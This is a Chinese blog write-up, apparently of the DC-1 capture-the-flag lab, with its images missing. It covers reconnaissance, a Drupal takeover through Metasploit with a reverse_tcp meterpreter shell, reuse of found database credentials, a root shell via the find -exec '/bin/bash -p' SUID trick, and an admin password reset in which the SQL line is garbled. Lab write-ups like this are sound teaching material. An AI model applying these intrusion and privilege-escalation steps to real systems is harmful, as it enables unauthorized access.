靶机-DC1

嗅探同网段IP地址

在这里插入图片描述

nmap探测端口

在这里插入图片描述

dirb探测敏感信息

在这里插入图片描述

访问80端口地址

在这里插入图片描述

wappalyzer查看网站信息

在这里插入图片描述

cms是Drupal

msf利用Drupal

在这里插入图片描述

选择利用模块

在这里插入图片描述

发现了熟悉的反弹shell:php/meterpreter/reverse_tcp

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

找到第一给flag

在这里插入图片描述

一般来说一个CMS都有一个配置文件,使用find查找(find方法用不了)

在这里插入图片描述

发现是一个mysql数据库的内容,库名,账号密码

在这里插入图片描述

service mysql start应该能连上的,这里连不上

cd查看etc下

在这里插入图片描述

发现flag4

在这里插入图片描述

在这里插入图片描述

翻译来提示意思就是:

您可以使用相同的方法在根目录中查找或访问标志吗?

可能。但也许并没有那么容易。也许是这样?

22端口开启使用ssh,获得密码

在这里插入图片描述

成功连接打开,提示要find提权

在这里插入图片描述

find提权找到最后一个flag

find -name flag4.txt -exec /bin/bash -p;

在这里插入图片描述

mysql -udbuser -pR0ck3t进入数据库

在这里插入图片描述

在这里插入图片描述

用exp添加一个管理员

searchsploit是kali自带的一个exp查询工具,会从本地 / 远程的exploit-db查询exp / shellcode searchsploit drupal 查看漏洞攻击脚本 发现有一个针对于drupal 7的攻击版本可以增加管理员 然后利用python脚本增加管理员 local 34992.py

在这里插入图片描述

脚本没用成功,改用ssh数据库
在这里插入图片描述

#第一段接新密码,第二段接从aln前三位开始到最后
<*f7p.aln.VeeNp0bPNuZo4tZEjLyq8GHL*" where name=“admin”;

用drupal的加密脚本加密,脚本在根目录下的scripts

ctrl+c 退出MySQL
meterpreter > shell #重新进入shell

Process 3708 created.
Channel 2 created.
python -c ‘import pty; pty.spawn(“/bin/bash”)’ 重新取得交互式shell
www-data@DC-1:/var/www$ php scripts/password-hash.sh xinmima

#后面的是你设置的密码
在这里插入图片描述

  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值